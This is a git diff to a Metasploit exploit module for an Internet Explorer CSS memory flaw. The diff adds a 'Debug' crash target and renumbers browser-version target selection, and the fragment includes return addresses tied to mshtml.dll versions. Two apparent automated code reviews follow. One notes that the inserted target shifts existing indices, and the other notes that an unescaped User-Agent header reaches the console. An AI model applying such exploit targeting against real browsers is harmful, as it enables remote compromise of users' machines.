diff --git a/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb index a87ae79811..7df2a747c7 100644 --- a/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_xxx_ie_css_clip.rb @@ -82,6 +82,15 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'Automatic', { } ], + # + # Special target, we put it first so its index doesn't change. + # + [ 'Debug', + { + 'Ret' => 0x00010101, # tiny spray, sure to crash :) + } + ], + # # In the targets below, 'Ret' means where EIP ends up (not under our control) # @@ -101,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Ret' => 0x7a6902d7, # mshtml.dll 8.00.7600.16385 @ 0x68e40000 } - ], + ] ], 'DisclosureDate' => 'Nov 3 2010', 'DefaultTarget' => 0)) @@ -113,11 +122,11 @@ class Metasploit3 < Msf::Exploit::Remote agent = request.headers['User-Agent'] #print_status("Checking user agent: #{agent}") if agent =~ /MSIE 6\.0/ - mytarget = targets[1] # IE6 on NT, 2000, XP and 2003 + mytarget = targets[2] # IE6 on NT, 2000, XP and 2003 elsif agent =~ /MSIE 7\.0/ - mytarget = targets[2] # IE7 on XP and 2003 + mytarget = targets[3] # IE7 on XP and 2003 elsif agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 6\.1/ - mytarget = targets[3] # IE8 on Windows 7 + mytarget = targets[4] # IE8 on Windows 7 else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end
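Review bot: The added comment in the first hunk says the Debug target is put "first so its index doesn't change", but it is inserted at index 1, after 'Automatic', and that insertion shifts every existing target down by one. The third hunk has to renumber `targets[1]`..`targets[3]` to `targets[2]`..`targets[4]` for exactly that reason, and anyone who selected a target by numeric index before this commit now silently gets a different entry. I would reword the comment to say what is actually guaranteed, e.g. `# Special target, kept directly after 'Automatic' so that adding targets below never changes its index.`, and state there that 0x00010101 is a deliberate crash value for debugging only. The auto-detection branches in the third hunk would be sturdier if they looked the entry up by target name instead of a literal index; the names are not visible in this diff, so that part is a suggestion to check against the full file. The targets array opens and closes outside this hunk.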
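Review bot: In the third hunk the `else` branch prints the client-supplied User-Agent header verbatim to the operator console with `print_error("Unknown User-Agent #{agent} ...")`. That header is fully controlled by the remote client, so control characters or terminal escape sequences in it reach the console and any log that captures it. Escaping it on output closes that, e.g. `print_error("Unknown User-Agent #{agent.inspect} from #{cli.peerhost}:#{cli.peerport}")`, which also renders a missing header as `nil` instead of an empty string. As a smaller style point on the same lines, `agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 6\.1/` reads more conventionally with `&&`. The enclosing method starts and ends outside the hunk, so whether `mytarget` is checked for nil after this branch cannot be confirmed from here.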